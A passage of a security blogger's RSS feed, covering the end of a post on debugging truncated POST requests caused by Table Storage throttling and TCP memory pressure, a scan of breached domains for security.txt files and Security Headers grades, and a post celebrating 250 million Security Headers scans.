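	$exists = (bool) $tableStorageLookup($user); // Cache miss: one single-entity query
	$redis-&gt;setex($key, 3600, $exists ? &apos;1&apos; : &apos;0&apos;); // Populate Redis for next time
	return $exists;
}</code></pre><p></p><p>The important property is that a hit costs no Table Storage call at all and a miss costs a single-entity query, which is a world away from pulling the entire user list on every batch.</p>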
<p>It&apos;s become an increasingly large query over time and, because we&apos;re talking to Table Storage, I also need to update my TCP overheads list from earlier.</p><p></p><ol><li>Cloudflare Worker --&gt; TCP --&gt; Ingestion Servers</li><li><s>Nginx --&gt; TCP --&gt; PHP</s></li><li>PHP --&gt; TCP --&gt; Redis</li><li>PHP --&gt; TCP --&gt; Azure Table Storage</li></ol><p></p><p>So where I thought I&apos;d reduced our TCP overheads by 1/3, it was really only a 1/4 reduction, and it means that those error logs from our consumer servers are now relevant. If they&apos;re having issues talking to Table Storage, then the ingestion servers probably are too.</p><p></p><h4 id="breaching-azure-table-storage-performance-limits">Breaching Azure Table Storage Performance Limits</h4><p>Azure Table Storage is fast, really fast, but everything has limits, and we were pushing the limits of Table Storage. The limit for <a href="https://learn.microsoft.com/en-us/azure/storage/tables/storage-performance-checklist?ref=scotthelme.co.uk#entities-per-second-storage-account">Entities Per Second</a> set by Microsoft is defined as:</p><p></p><blockquote>The scalability limit for accessing tables is up to 20,000 entities (1 KB each) per second for an account.</blockquote><p></p><p>A couple of things stood out to me right away here. First of all, we have tens of thousands of users, and many servers performing that query, so it&apos;s not going to be hard for us to hit 20,000 entities queried per second, but there&apos;s also a size limit. If it&apos;s 20,000 entities per second, with a 1 KB size, I assume that gives us a theoretical maximum read rate of 20 MB/s, otherwise the size wouldn&apos;t need to be specified. Our typical user entity isn&apos;t too much larger than this, at 4-5 KB, but we&apos;re definitely going to see reduced entity query rates if the size is a factor.</p><p>I went over to the Azure Portal and there is a metric available for our storage account to look at the number of throttled transactions against our tables, and...</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-13.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1867" height="700" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-13.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-13.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/09/image-13.png 1600w, https://scotthelme.co.uk/content/images/2023/09/image-13.png 1867w" sizes="(min-width: 720px) 720px"></figure><p></p><p>We were being throttled by Azure! I&apos;m not sure of the specifics around how this works, and I was seeing connection timeout, connection refused and 503 errors in our logs, but those things would make sense if we were approaching the performance capabilities of Table Storage. The two larger spikes to the right also align with when I observed the issue happening, but not the other spikes. Perhaps they weren&apos;t big enough to trigger the backlog problem and we were able to ride it out, but this felt like I was on to something.</p><p></p><h4 id="exponential-backoff">Exponential backoff</h4><p>I dug into our code again to see what the behaviour would be in this scenario, where connections or transactions against Table Storage are failing, and found that we&apos;re using an exponential backoff. That&apos;s a sensible approach, and maybe our values need tweaking, but it&apos;s not a bad setup.
</p><p></p><pre><code class="language-php">	private static function pushMiddlewares(ServiceRestProxy $service): void
	{
		$service-&gt;pushMiddleware(RetryMiddlewareFactory::create(
			RetryMiddlewareFactory::GENERAL_RETRY_TYPE, // retry type
			3, // number of retries
			1000, // interval in ms
			RetryMiddlewareFactory::EXPONENTIAL_INTERVAL_ACCUMULATION, // accumulation method
			true, // retry on connection failures
		));
		$service-&gt;pushMiddleware(new SanitizeExceptionMiddleware());
	}</code></pre><p></p><p>With connection timeouts/failures, or slow responses from Table Storage before getting the 503, taking up to 1,000ms or more, coupled with this retry logic, there are easily scenarios here where PHP could be tied up for 15+ seconds: assuming a doubling interval, three retries accumulating exponentially from 1,000ms is already 1s + 2s + 4s of waiting alone, before you count the time spent on the failing requests themselves. That&apos;s a lot of waiting around, and still only a good theory at this point, so it was time to test it.</p><p></p><h4 id="reproducing-the-issue-locally">Reproducing the issue locally</h4><p>Because all I had was a theory, I wanted to reproduce it and see it with my own eyes. Given the relative simplicity of this problem, it shouldn&apos;t prove too hard to reproduce, so I fired up a server with the same resources as our ingestion servers and created a simple PHP script.</p><p></p><pre><code>&lt;?php
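  // Simulate a loaded ingestion server: hold an outbound TCP connection
  // open, stall as if waiting on a slow upstream, then try to parse the
  // POSTed JSON body.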

  $fp = fsockopen(&quot;scotthelme.co.uk&quot;, 80, $errno, $errstr, 30);

  sleep(30);

  $json = json_decode(file_get_contents(&apos;php://input&apos;));

  if ($json == null) {
    syslog(LOG_WARNING, &quot;JSON decode failed: &quot; . $_SERVER[&apos;CONTENT_LENGTH&apos;] . &quot; &quot; . strlen(file_get_contents(&apos;php://input&apos;)));
  }</code></pre><p></p><p>The script needed to simulate what our ingestion servers were doing, so it would:</p><p></p><ol><li>Receive an HTTP POST request with a JSON payload.</li><li>Have Nginx pass that to PHP via a Unix socket.</li><li>Open a TCP connection from PHP to pressure TCP resources.</li><li>Sleep in PHP to simulate slow external connections.</li><li>Try to parse the JSON payload.</li></ol><p></p><p>In order to hit this endpoint with load, I created a simple bash script on my local machine.</p><p></p><pre><code>#!/bin/bash
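# post.sh -- fire one sizeable JSON POST at the test server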
curl --location &apos;http://167.99.196.71/&apos; \
-H &apos;Content-Type: text/plain&apos; \
-X POST \
-d @post.data \
--insecure</code></pre><p></p><p>The <code>post.data</code> file contained 1MB of valid JSON so I had a sizeable POST request to test with, and then I just needed to load up the server with requests.</p><p></p><pre><code>$ for i in $(seq 50); do ./post.sh &amp; done</code></pre><p></p><p>This would fire up 50 instances of the script at the same time, and the command can be re-run on a time interval to progressively load up the server. It didn&apos;t take long...</p><p></p><pre><code>Sep 18 22:57:41 delete-me kernel: [ 6910.201032] TCP: out of memory -- consider tuning tcp_mem
Sep 18 22:57:41 delete-me kernel: [ 6910.275034] TCP: out of memory -- consider tuning tcp_mem
Sep 18 22:57:41 delete-me kernel: [ 6910.624642] TCP: out of memory -- consider tuning tcp_mem
Sep 18 22:57:44 delete-me kernel: [ 6913.017896] net_ratelimit: 9 callbacks suppressed
Sep 18 22:57:44 delete-me kernel: [ 6913.017900] TCP: out of memory -- consider tuning tcp_mem
Sep 18 22:58:01 delete-me ool www: JSON decode failed: 1001553 65536</code></pre><p></p><p>The <strong>exact</strong> same problem!! The payload was even truncated at the exact same size, which perhaps makes sense because the server has the same resources so probably the same default values around <code>tcp_mem</code>. This was great to see. I could reliably reproduce the problem, which meant that, now it was identified, the fix should be good to go.</p><p></p><h4 id="fixing-the-issue">Fixing the issue</h4><p>By now, it&apos;s pretty clear what the fix is and it didn&apos;t take much effort to implement the changes.</p><p>The first and immediate change was for the <code>batch_reject()</code> code to use the User Entity Cache service for querying the existence of users. This should all but eliminate any querying against Table Storage, and even if queries were triggered, they would be to check the existence of a single user and not to pull out our entire user list.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-14.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1114" height="328" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-14.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-14.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image-14.png 1114w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Quite a small change to make quite a big impact!</p><p>My next change will be to shift this code from the ingestion servers to the consumer servers instead. The consumers have far less pressure and given the volume of reports flowing through the ingestion servers, they just need to get out of the way and push reports into Redis as efficiently as possible. That&apos;s a ticket for another day, though, because the main focus was to avoid seeing this issue again and I&apos;m happy to say that since the fix was deployed, it hasn&apos;t happened again. Not only that, I&apos;m seeing a reduction in the transactions against Table Storage and generally lower CPU usage across the ingestion servers. All is good.</p><p></p><h4 id="phew">Phew!</h4><p>That was quite the post, and I hope it was interesting to follow along! Even though the issue was finally resolved, I did still have a few questions left outstanding after this and maybe someone out there can help?</p><p></p><h6 id="should-nginx-pass-these-requests-through">Should Nginx pass these requests through?</h6><p>I never fully investigated the cause of the truncated payloads because that seemed to be a symptom of the problem rather than the problem itself. My current theory is that the inbound connections were being terminated and the partial payload received was then being processed by Nginx. In this scenario, I was surprised that Nginx would pass it through to PHP, but maybe there&apos;s a good reason for that and someone can share it below! I&apos;d have thought that requests like this would not make it beyond Nginx and they&apos;d show up in the error log.</p><p></p><h6 id="why-is-php-processing-these-requests">Why is PHP processing these requests?</h6><p>This is dependent on the answer to the above, but there is also the possibility that Nginx is sending the full request through and that PHP is cutting the payload short when receiving it, though I don&apos;t believe so based on the logs from Nginx.
Either way, I&apos;m not sure why PHP would try to process only a partial request, whether it was cut short by Nginx or by PHP itself.</p><p></p><h6 id="how-should-i-tune-tcpmem">How should I tune tcp_mem? </h6><p>I&apos;ve read a <em>lot</em> about how to do this but can&apos;t say I&apos;ve walked away with a definitive answer, if one even exists. Our ingestion servers have more than enough resources and no other burdens, so for now, I&apos;ve modestly increased the <code>pressure</code> and <code>high</code> values, but they could probably do with having a little more thought put into them.</p><p></p><p>I think I&apos;ve had enough of fighting fires so I&apos;ll get back to writing code and building new features &#x1F60E;</p><p></p><p><strong><em>Update 2nd Oct 2023:</em></strong> I&apos;ve published a second blog post with further debugging and information - <a href="https://scotthelme.co.uk/processing-truncated-requests-php-debugging-deep-dive/?ref=scotthelme.co.uk" rel="noreferrer">Processing Truncated Requests? A PHP Debugging Deep Dive</a></p><p></p>]]></content:encoded></item><item><title><![CDATA[Do breached sites take security seriously?]]></title><description><![CDATA[<p>Over the weekend, I saw a tweet from Troy Hunt who posed a little project idea. Having heaps of spare time... I thought I&apos;d take on the challenge and see if I could help!</p><p></p><h4 id="the-idea">The idea</h4><p>As I&apos;m sure many of you know, Troy runs <a href="https://haveibeenpwned.com/?ref=scotthelme.co.uk">Have</a></p>]]></description><link>https://scotthelme.co.uk/do-breached-sites-take-security-seriously/</link><guid isPermaLink="false">64bfe522aabfe60001bdb9dc</guid><category><![CDATA[Security Headers]]></category><category><![CDATA[security.txt]]></category><category><![CDATA[Have I Been Pwned]]></category><category><![CDATA[Probely]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Wed, 26 Jul 2023 14:24:43 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/07/hibp.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/07/hibp.png" alt="Do breached sites take security seriously?"><p>Over the weekend, I saw a tweet from Troy Hunt who posed a little project idea. Having heaps of spare time... I thought I&apos;d take on the challenge and see if I could help!</p><p></p><h4 id="the-idea">The idea</h4><p>As I&apos;m sure many of you know, Troy runs <a href="https://haveibeenpwned.com/?ref=scotthelme.co.uk">Have I Been Pwned</a>, a site that tracks data breaches and allows people or organisations to be alerted to their exposure. Of course, after a data breach, one might wonder how seriously a website takes security, given the event.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-10.png" class="kg-image" alt="Do breached sites take security seriously?" loading="lazy" width="721" height="114" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-10.png 600w, https://scotthelme.co.uk/content/images/2023/07/image-10.png 721w" sizes="(min-width: 720px) 720px"></figure><p></p><!--kg-card-begin: html--><blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">Looking for a little project to keep you busy on the weekend? I was just thinking: how many of the breached websites in <a href="https://twitter.com/haveibeenpwned?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@haveibeenpwned</a> now have a security.txt file?
So, if you feel like grabbing those domains and querying them all, there&apos;s an API here: <a href="https://t.co/ftiKkfH7Hp?ref=scotthelme.co.uk">https://t.co/ftiKkfH7Hp</a></p>&#x2014; Troy Hunt (@troyhunt) <a href="https://twitter.com/troyhunt/status/1682982538409828354?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">July 23, 2023</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script><!--kg-card-end: html--><p></p><p>That sounds simple enough, let&apos;s get on it!</p><p></p><h4 id="crawlerninja">Crawler.Ninja</h4><p>I have another project called <a href="https://crawler.ninja/?ref=scotthelme.co.uk">https://crawler.ninja</a>, where I scan the top 1,000,000 sites in the World every day and analyse various aspects of their security. You can see a summary of the daily scan data, or access a dump of all historic scan data, but be warned, there are now many terabytes(!) of historic data!</p><p>I sliced out a bit of the crawler code, because I already look for the presence of the <a href="https://scotthelme.co.uk/say-hello-to-security-txt/?ref=scotthelme.co.uk">security.txt</a> file that Troy was asking for, and then I could run the scan against the list of breached domains from HIBP. Pulling the list of domains for all the breaches in HIBP is easy; <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/getUniqueBreachDomains.php?ref=scotthelme.co.uk">here&apos;s my code</a> to do it.</p><p></p><pre><code class="language-php">&lt;?php

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, &apos;https://haveibeenpwned.com/api/v3/breaches&apos;);
$response = curl_exec($ch);
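// Decode the list of breaches returned by the HIBP v3 API.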
$breachList = json_decode($response, true);
$domainList = [];
foreach ($breachList as $breach) {
	if (isset($breach[&apos;Domain&apos;]) &amp;&amp; trim(strtolower($breach[&apos;Domain&apos;])) !== &apos;&apos;) {
		$domainList[] = trim(strtolower($breach[&apos;Domain&apos;]));
	}
}
$domainList = array_unique($domainList);
foreach ($domainList as $domain) {
	file_put_contents(&apos;output.txt&apos;, $domain . &quot;\r\n&quot;, FILE_APPEND | LOCK_EX);
}</code></pre><p></p><p>Here&apos;s the list of <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/output.txt?ref=scotthelme.co.uk">641 unique domains</a> that I found and that I used for analysis.</p><p></p><h4 id="securitytxt">Security.txt</h4><p>The idea of the <a href="https://scotthelme.co.uk/say-hello-to-security-txt/?ref=scotthelme.co.uk">security.txt</a> is really quite simple and it&apos;s explained in that blog post, but the TL;DR is: you can put contact info in a text file in this specified location for people to reach you when things go bad. You can see I have one of these files on my important sites:</p><p><a href="https://scotthelme.co.uk/.well-known/security.txt?ref=scotthelme.co.uk">https://scotthelme.co.uk/.well-known/security.txt</a><br><a href="https://securityheaders.com/.well-known/security.txt?ref=scotthelme.co.uk">https://securityheaders.com/.well-known/security.txt</a><br><a href="https://report-uri.com/.well-known/security.txt?ref=scotthelme.co.uk">https://report-uri.com/.well-known/security.txt</a></p><p></p><p>There are some specific requirements on where to host this file and how to present it in <a href="https://datatracker.ietf.org/doc/html/rfc9116?ref=scotthelme.co.uk">RFC 9116</a>, but for the most part, it seems that people get it right. Notably, the following:</p><p></p><blockquote>For web-based services, organizations MUST place the &quot;security.txt&quot; file under the &quot;/.well-known/&quot; path<br><br>The file MUST be accessed via HTTP 1.0 or a higher version, and the file access MUST use the &quot;https&quot; scheme<br><br>It MUST have a Content-Type of &quot;text/plain&quot; with the default charset parameter set to &quot;utf-8&quot;<br><br>This field [Contact] MUST always be present in a &quot;security.txt&quot; file.</blockquote><p></p><p>It seems the biggest failure of sites that attempt to meet the requirements is to have a <code>content-type</code> of <code>text/plain</code> instead of the required <code>text/plain; charset=utf-8</code>. For this analysis, I&apos;m going to take a slightly more relaxed approach and allow <code>text/plain</code>, but I&apos;ve also provided the list of compliant sites with the more strict check too. </p><p>On the <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/securityTxtSitesStrict.txt?ref=scotthelme.co.uk">strict check</a>, only 6 sites out of the 641 checked have a security.txt file and on the <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/securityTxtSitesRelaxed.txt?ref=scotthelme.co.uk">relaxed check</a>, it&apos;s slightly better at 11... That means we&apos;re only seeing around 1.7% of these sites using security.txt files!</p><p></p>
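<p>Out of interest, here&apos;s roughly what a strict check like that could look like in PHP. This is an illustrative sketch rather than the actual crawler code: the function name and the exact <code>content-type</code> comparison are my assumptions, and real-world headers vary in casing and spacing.</p><p></p><pre><code class="language-php">&lt;?php

// Hypothetical strict RFC 9116 check covering the MUSTs quoted above:
// served over HTTPS from /.well-known/, a text/plain content-type with
// a utf-8 charset, and a Contact field present in the body.
function hasStrictSecurityTxt(string $domain): bool
{
	$ch = curl_init(&apos;https://&apos; . $domain . &apos;/.well-known/security.txt&apos;);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	$body = curl_exec($ch);
	$status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
	$contentType = (string) curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
	curl_close($ch);

	return is_string($body)
		&amp;&amp; $status === 200
		&amp;&amp; strtolower(str_replace(&apos; &apos;, &apos;&apos;, $contentType)) === &apos;text/plain;charset=utf-8&apos;
		&amp;&amp; stripos($body, &apos;Contact:&apos;) !== false;
}</code></pre><p></p><p>The relaxed variant would simply loosen that <code>content-type</code> comparison to accept a bare <code>text/plain</code> too.</p><p></p>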
<h4 id="security-headers">Security Headers</h4><p>Whilst I was doing this security analysis, I figured I could quickly and easily extend this to add some more value. Regular readers will know of my <a href="https://securityheaders.com/?ref=scotthelme.co.uk">Security Headers</a> project that recently joined <a href="https://scotthelme.co.uk/security-headers-is-joining-probely/?ref=scotthelme.co.uk">Probely</a>, where you can do a free security scan of your website in ~2 seconds! Well, Security Headers also has <a href="https://scotthelme.co.uk/announcing-the-new-security-headers-api-new-features-and-upgrades/?ref=scotthelme.co.uk">an API</a> so I wrote a quick <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/securityHeadersApiClient.php?ref=scotthelme.co.uk">API client</a> to run the list of HIBP domains against the Security Headers API too. You can see the <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/securityHeadersGrade.txt?ref=scotthelme.co.uk">raw results</a> to do your own analysis, but I think this graph nicely summarises that things aren&apos;t as good as they could be.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-9.png" class="kg-image" alt="Do breached sites take security seriously?" loading="lazy" width="1877" height="1059" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-9.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-9.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/07/image-9.png 1600w, https://scotthelme.co.uk/content/images/2023/07/image-9.png 1877w" sizes="(min-width: 720px) 720px"></figure><p></p><p>There were a handful of domains that didn&apos;t resolve, some that blocked our scanner outright and some that didn&apos;t respond to the scanner, but we got a successful scan on the 483 domains shown in the data. Here&apos;s how the scores break down for them.</p><p></p><!--kg-card-begin: markdown--><table>
<thead>
<tr>
<th>Grade</th>
<th>Sites</th>
</tr>
</thead>
<tbody>
<tr>
<td>A+</td>
<td>1</td>
</tr>
<tr>
<td>A</td>
<td>68</td>
</tr>
<tr>
<td>B</td>
<td>41</td>
</tr>
<tr>
<td>C</td>
<td>58</td>
</tr>
<tr>
<td>D</td>
<td>141</td>
</tr>
<tr>
<td>E</td>
<td>0</td>
</tr>
<tr>
<td>F</td>
<td>174</td>
</tr>
</tbody>
</table>
<!--kg-card-end: markdown--><p></p><p>Surprisingly it&apos;s not <em>too</em> bad, but there was only a <a href="https://securityheaders.com/?q=catho.com.br&amp;followRedirects=on&amp;ref=scotthelme.co.uk">single site</a> that got an A+, on a list of some really, really big sites.</p><p>It will be interesting to see how this tracks in the future and whether or not the presence of something like a security.txt file, or even your score on Security Headers, can be used in any way as an indicator of how seriously you take security! &#x1F914;</p><p></p><p>Want to try the <a href="https://securityheaders.com/api/?ref=scotthelme.co.uk">Security Headers API</a>? Get 10% off your first 3 months with <strong>HIBP10</strong> at checkout!</p><p></p>]]></content:encoded></item><item><title><![CDATA[Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;]]></title><description><![CDATA[<p>As I sit and write this blog post I still find it absolutely unreal how far this little idea, that I had all of those years ago, has come! Let&apos;s take a look back at the journey of Security Headers so far, and the journey ahead.</p><p></p><figure class="kg-card kg-image-card"><a href="https://securityheaders.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/07/image-8.png" class="kg-image" alt loading="lazy" width="300" height="42"></a></figure><p></p><h4 id="humble-beginnings">Humble Beginnings</h4>]]></description><link>https://scotthelme.co.uk/celebrating-250-000-000-scans-on-security-headers/</link><guid isPermaLink="false">64aeaaf4b2742600011abd3a</guid><category><![CDATA[Security Headers]]></category><category><![CDATA[Probely]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Wed, 19 Jul 2023 08:53:16 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/07/scans.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/07/scans.png" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;"><p>As I sit and write this blog post I still find it absolutely unreal how far this little idea, that I had all of those years ago, has come! Let&apos;s take a look back at the journey of Security Headers so far, and the journey ahead.</p><p></p><figure class="kg-card kg-image-card"><a href="https://securityheaders.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/07/image-8.png" class="kg-image" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;" loading="lazy" width="300" height="42"></a></figure><p></p><h4 id="humble-beginnings">Humble Beginnings</h4><p>All the way back in Feb 2015, I was really starting to dig into the analysis of <a href="https://securityheaders.com/?ref=scotthelme.co.uk">Security Headers</a> on other sites and after getting bored of digging around in Dev Tools, I created a tool to make it easy for me. Outlined in my blog, <a href="https://scotthelme.co.uk/introducing-securityheaders-io/?ref=scotthelme.co.uk">Introducing SecurityHeaders.io</a>, I launched the first version of the site, which looked very different to how it does today!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-4.png" class="kg-image" alt="Celebrating 250,000,000 scans on Security Headers! 
&#x1F973;&#x1F389;" loading="lazy" width="1111" height="577" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-4.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-4.png 1000w, https://scotthelme.co.uk/content/images/2023/07/image-4.png 1111w" sizes="(min-width: 720px) 720px"></figure><p></p><p>There was no scoring, no nice layout, it was simple and basic but it got the job done.</p><p>Less than a year later, though, in Dec 2015, I published <a href="https://scotthelme.co.uk/launching-the-new-version-of-securityheaders-io/?ref=scotthelme.co.uk">Launching the new version of securityheaders.io</a>, which introduced scoring for your A+ to F grade and the visuals that will be familiar with you today. The scoring was inspired by SSL Labs after I&apos;d noticed how much people will &apos;chase the grade&apos;. If you tell someone they got a grade B, they almost naturally want to improve that, and I wanted to harness that same gamification that SSL Labs had for SSL configuration and put it to good use for Security Headers configurations!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-5.png" class="kg-image" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;" loading="lazy" width="997" height="641" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-5.png 600w, https://scotthelme.co.uk/content/images/2023/07/image-5.png 997w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Just a few months later and Security Headers made it to the front page of Hacker News and things really began to take off! It could have been the gamification of the grading, or just a friendly user sharing a link for us, but it resonated well with the community and we got a huge swell of support.</p><p></p><!--kg-card-begin: html--><blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">A day on the front page of Hacker News and <a href="https://twitter.com/securityheaders?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@securityheaders</a> has just passed 250,000 scans!!! <a href="https://t.co/ED7qlqDKix?ref=scotthelme.co.uk">pic.twitter.com/ED7qlqDKix</a></p>&#x2014; Scott Helme (@Scott_Helme) <a href="https://twitter.com/Scott_Helme/status/697874135494631424?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">February 11, 2016</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script><!--kg-card-end: html--><p></p><p>250,000 scans was a <em>really</em> big deal for me back then, and it&apos;s pretty wild to think that we&apos;ve added another 3 zeros since, but I had absolutely no idea that this was only the beginning!</p><p></p><h4 id="continuing-to-grow">Continuing To Grow</h4><p>As the months and years ticked by, we continued to cross through some awesome milestones. As each one came and rolled by, I still couldn&apos;t believe just how popular the site was becoming and the site seemed to be growing in popularity at &#xA0;a relentless pace.</p><p></p><!--kg-card-begin: html--><blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">Overnight we passed through 1,000,000 scans! &#x1F389;&#x1F389;&#x1F389; <a href="https://t.co/lh6PR1Ds56?ref=scotthelme.co.uk">pic.twitter.com/lh6PR1Ds56</a></p>&#x2014; Security Headers (@securityheaders) <a href="https://twitter.com/securityheaders/status/751314498204631040?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">July 8, 2016</a></blockquote><br>

<blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">We passed through 10,000,000 scans!!! &#x1F389;&#x1F389;&#x1F389; <a href="https://t.co/NGnYZqJyBP?ref=scotthelme.co.uk">pic.twitter.com/NGnYZqJyBP</a></p>&#x2014; Security Headers (@securityheaders) <a href="https://twitter.com/securityheaders/status/964167638413955072?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">February 15, 2018</a></blockquote><br>

<blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">We&apos;re so grateful to have <a href="https://twitter.com/probely?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@probely</a> sponsoring us and supporting the project! As we fast approach 100,000,000 scans, having their support is essential to keep the service free and available for everyone. Check them out here: <a href="https://t.co/x8xVG5TjW7?ref=scotthelme.co.uk">https://t.co/x8xVG5TjW7</a> &#x2764; <a href="https://t.co/6C4LXCWLLZ?ref=scotthelme.co.uk">pic.twitter.com/6C4LXCWLLZ</a></p>&#x2014; Security Headers (@securityheaders) <a href="https://twitter.com/securityheaders/status/1301079282312196096?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">September 2, 2020</a></blockquote><!--kg-card-end: html--><p></p><p>Very quickly we hit 100,000,000 scans in Sep 2020 and I really felt like I&apos;d made something to be proud of. One of the most notable memories I have around that time was of an old colleague and friend sharing a penetration test report with me that they&apos;d received and in it, a screenshot from the Security Headers site!! Their guidance was that they needed to improve their HTTP Response Headers and Security Headers had established itself as such a reputable player in the industry, they were happy to refer to us as their proof with a grade F! If you&apos;ve got any similar stories, or places that you&apos;ve seen Security Headers linked or referenced, please let me know in the comments below, it&apos;d be awesome to see.</p><p>In that very same month, we also announced our newest sponsor, <a href="https://probely.com/?utm_source=securityheading&amp;utm_medium=display&amp;utm_campaign=logo">Probely</a>, who were one of only a few companies to ever come forwards and support this free tool used by so many. This sponsorship would turn out to be our longest standing, and most supportive, eventually culminating in an even larger announcement. The growth of the site continued and Security Headers added more powerful capabilities and became yet more popular. As the awareness around Cyber Security continued to rise, or as more people just shared a link to this free tool, the numbers grew and grew.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-6.png" class="kg-image" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;" loading="lazy" width="1958" height="1076" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-6.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-6.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/07/image-6.png 1600w, https://scotthelme.co.uk/content/images/2023/07/image-6.png 1958w" sizes="(min-width: 720px) 720px"></figure><p></p><p>You can see the clear upward kick in our scan numbers from Feb 2019 onwards, and whilst I don&apos;t know exactly what happened to cause that, it&apos;s been a mega journey to see it not only grow the way it has, but to continue to maintain that growth too. </p><p></p><h4 id="to-the-future">To The Future</h4><p>Regular readers will know that just a few weeks back, I announced that <a href="https://scotthelme.co.uk/security-headers-is-joining-probely/?ref=scotthelme.co.uk">Security Headers is joining Probely</a>. 
That blog post outlines all of the details so you can head over there if you want the lowdown, but one of the things that I said in that announcement was that Security Headers would live on exactly as you knew it before. And it has.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-7.png" class="kg-image" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;" loading="lazy" width="1240" height="858" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-7.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-7.png 1000w, https://scotthelme.co.uk/content/images/2023/07/image-7.png 1240w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Security Headers is continuing to see the same rate of growth under Probely that it did previously and we&apos;re currently working on things behind the scenes to make that even better. My previous blog post on Security Headers <a href="https://scotthelme.co.uk/announcing-the-new-security-headers-api-new-features-and-upgrades/?ref=scotthelme.co.uk">announced our new API</a> so you can easily, and cheaply, automate the regular scanning of your websites and I&apos;m also really happy to see great growth there too.</p><p>All in all, I couldn&apos;t be more pleased with how things are working out for this little tool that I built to make my life a little easier and then decided to share with the World! Hopefully I&apos;ll see you back here in 2024 for the 300,000,000 scans announcement &#x1F60E;</p><p></p>]]></content:encoded></item><item><title><![CDATA[Cryptographic Agility Part 1: Server Certificates]]></title><description><![CDATA[<p>We&apos;ve encountered a lot of problems of our own making in the TLS/PKI ecosystem in recent years, and whilst we&apos;ve got better at dealing with them and even avoiding them, there&apos;s still a way to go. </p><p></p><h4 id="certificate-lifetime">Certificate Lifetime</h4><p>The focus of these blog</p>]]></description><link>https://scotthelme.co.uk/cryptographic-agility-part-1-server-certificates/</link><guid isPermaLink="false">64a423acdb9bbf00018bb12a</guid><category><![CDATA[TLS]]></category><category><![CDATA[PKI]]></category><category><![CDATA[Certificate Transparency]]></category><category><![CDATA[Let's 